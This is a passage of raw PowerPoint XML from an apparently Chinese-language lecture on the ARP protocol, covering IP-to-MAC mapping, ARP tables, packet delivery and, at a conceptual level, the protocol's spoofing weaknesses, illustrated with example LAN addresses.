              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3742160" y="592698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B</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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9" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1600200"/>
            <a:ext cx="7924800" cy="2130425"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>协议，实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的绑定和查询</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="156690"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672" y="2564904"/>
            <a:ext cx="5616575" cy="3963988"/>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132" name="标题 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址解析协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ARP</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56689">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wedge">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="156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56690"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wedge">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="156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9"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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>每个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>节点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>(Host, Router)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>都有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>表</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP-MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址映射</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>&lt; IP address; MAC address; TTL&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t> TTL (Time To Live): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>映射地址的失效时间 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>典型为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>分钟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52227" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ARP: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址解析协议</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="44" name="Picture 2" descr="http://g.hiphotos.baidu.com/baike/pic/item/b90e7bec54e736d13916d2229b504fc2d562699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4149080"/>
            <a:ext cx="4711828"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 calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="11" dur="5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2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anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="15" dur="5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62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anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="962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2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p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>数据包发送过程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>）发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>包时，发送方判断目标是否在同一网段（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP addr &amp;network mask</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>）（局域网内还是外）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>）同一网段（局域网）：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>a. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>检查</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>缓存，是否有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>表项，有直接发送</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>b. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>无</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>广播</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ARP Request&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>谁</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>跟目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>相同，报告位置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>c. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>收到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，回应</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ARP Reply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>（包含自己</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址），更新自己</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>表，添加或覆盖发送方</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ip,mac&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>d. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>发送方接收</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Reply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，更新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>表，否则传输失败（找不到目的主机）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>）不同网段，发送给网关，同样查找网关</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>动态刷新：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>所有收到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ARP Reply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的主机都更新自己的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>缓存</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238594" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>工作过程</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>指未授权个人以更改、收集或拒绝访问为目的而物理临近网络、系统或设备。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="338946" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>物理临近</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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450EA0C8-B9C6-49CB-8CC8-E230B1C920B5}"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dirty="0" smtClean="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>协议存在的问题</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61443" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>广播请求</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>更新广播全部接收者关于发送者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>缓存</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>发送错误的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>请求，错误的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>发送方</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP, MAC&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>单播应答</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>主动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>应答会被视为有效</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>信息而接收</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>发送错误的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>应答，错误的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>接收者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP, MAC&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="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7EA670CA-9CE3-4941-BB72-9CCB289DC1B9}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="898989"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8196" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址解析协议的安全威胁</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2560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10"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sp>
        <p:nvSpPr>
          <p:cNvPr id="25611"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5612"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5613"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5614" name="Straight Connector 23"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="3801269" y="3886994"/>
            <a:ext cx="425450" cy="531812"/>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5615"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5616"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ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25617"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8"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9"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0"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1"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2"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5623" name="Oval Callout 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1042988" y="3284538"/>
            <a:ext cx="2449512" cy="649287"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -22750"/>
              <a:gd name="adj2" fmla="val 114958"/>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1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>谁是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>192.168.1.102</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25624" name="Oval Callout 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4211638" y="4365625"/>
            <a:ext cx="865187" cy="503238"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -87866"/>
              <a:gd name="adj2" fmla="val 26579"/>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1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>我是</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="25626" name="Table 41"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="2565400"/>
          <a:ext cx="3348038" cy="2592387"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1511300"/>
                <a:gridCol w="1836738"/>
              </a:tblGrid>
              <a:tr h="518117">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:00:01</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r>
              <a:tr h="519018">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192.168.1.101</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:00:A1</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r>
              <a:tr h="518117">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192.168.1.102</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:00:A2</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r>
              <a:tr h="519018">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192.168.1.103</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:00:A3</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r>
              <a:tr h="518117">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192.168.1.104</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:00:A4</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r>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25646" name="Explosion 2 47"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1476375" y="4365625"/>
